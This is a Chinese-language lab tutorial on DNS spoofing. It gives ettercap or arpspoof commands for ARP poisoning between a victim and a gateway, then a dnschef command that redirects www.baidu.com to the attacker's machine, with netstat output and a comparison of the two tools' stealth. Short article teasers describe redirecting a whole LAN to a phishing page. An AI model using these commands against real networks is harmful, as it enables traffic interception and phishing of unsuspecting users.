一、dnschef實驗環境
二、操作步驟
1、在kali上開啟arp欺騙(二選一)
ettercap -t -q -m arp:remote -i eth0 /10.10.10.135// /10.10.10.2//
arpspoof -t 10.10.10.135 -r 10.10.10.2
2、在kali上開啟dnschef命令
dnschef --fakeip=10.10.10.136 --fakedomains=www.baidu.com -q --inte***ce=10.10.10.136
此命令相當於在dns伺服器中加入一條以下a記錄
www.baidu.com a 10.10.10.136
此時netstat命令,發現python(dnschef)開啟了53埠
root@kali2020:~# netstat -anput
active internet connections (servers and established)
proto recv-q send-q local address foreign address state pid/program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* listen 608/sshd
tcp 0 36 10.10.10.136:22 10.10.10.1:54952 established 3526/sshd: root@pts
tcp6 0 0 :::22 :::* listen 608/sshd
udp 0 0 10.10.10.136:53 0.0.0.0:* 5122/python3
udp 0 0 10.10.10.136:68 10.10.10.254:67 established 552/networkmanager
udp 0 0 0.0.0.0:69 0.0.0.0:* 593/inetutils-inetd
三、ettercap與dnschef對比
經過對比,很明顯ettercap使用dns_spoof外掛程式的情況明顯比dnschef好用,dnschef使用時多了一步在客戶端的dns伺服器設定步驟,且其開放了53埠,更容易被目標發現。
bettercap實現內網Dns欺騙
讓內網的所有計算機瀏覽網頁的時候,出現我的釣魚頁面 kali系統 bettercap 通過ifconfig檢視當前計算機的ip,我這邊為,192.168.1.150 建立乙個dns.conf檔案,下面這個dns語句的意思是 所有的.com結尾的 全部解析到我的本地http伺服器,com就是乙個正則,...
DNS欺騙攻擊
1.dns網域名稱系統 其主要作用是把主機的網域名稱解析ip位址的系統,即使伺服器更換了ip位址,我們依舊可以通過網域名稱訪問該伺服器。dns網域名稱查詢可以簡單的分為五個步驟 2.dns欺騙 dns欺騙就是利用了dns協議設計時的安全缺陷。首先欺騙者向目標機器傳送構造好的arp應答資料報,arp欺...
演示DNS欺騙攻擊
dns欺騙攻擊基於中間人攻擊。攻擊者更改受害者從dns伺服器查詢的網域名稱解析結果,給受害者傳送惡意網頁或釣魚網頁 瀏覽器依然顯示正常的url。本帖介紹怎麼使用ettercap施行dns欺騙攻擊,實現受害者訪問任何 都轉向到攻擊者指定的 情形描述 同一區域網內 受害者ip 192.168.0.106...